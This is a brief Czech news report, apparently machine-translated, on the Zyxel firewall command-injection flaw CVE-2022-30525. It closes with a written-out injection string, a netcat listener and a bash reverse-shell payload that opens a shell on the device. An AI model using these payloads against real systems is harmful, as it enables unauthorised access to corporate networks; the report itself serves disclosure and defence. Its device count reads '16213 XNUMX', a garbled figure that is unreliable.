V zařízeních Zyxel řady ATP, VPN a USG FLEX byla identifikována kritická zranitelnost (CVE-2022-30525), která byla navržena k organizaci provozu firewallů, IDS a VPN v podnicích, což umožňuje externímu útočníkovi spustit kód na zařízení bez uživatelských práv bez autentizace. Aby mohl útočník provést útok, musí být schopen odesílat požadavky na zařízení pomocí protokolu HTTP/HTTPS. Zyxel opravil chybu zabezpečení v aktualizaci firmwaru ZLD 5.30. Podle služby Shodan je v globální síti aktuálně 16213 XNUMX potenciálně zranitelných zařízení, která přijímají požadavky přes HTTP/HTTPS.
Operace se provádí odesláním speciálně navržených příkazů do webového obslužného programu /ztp/cgi-bin/handler, přístupného bez autentizace. Problém je způsoben nedostatečným řádným vyčištěním parametrů požadavku při provádění příkazů v systému pomocí volání os.system používaného v knihovně lib_wan_settings.py a prováděného při zpracování operace setWanPortSt.
Útočník by například mohl předat řetězec „; ping 192.168.1.210;" což povede k provedení příkazu „ping 192.168.1.210“ v systému. Chcete-li získat přístup k příkazovému shellu, můžete na svém systému spustit „nc -lvnp 1270“ a poté iniciovat zpětné připojení odesláním požadavku do zařízení s '; bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.
Zdroj: opennet.ru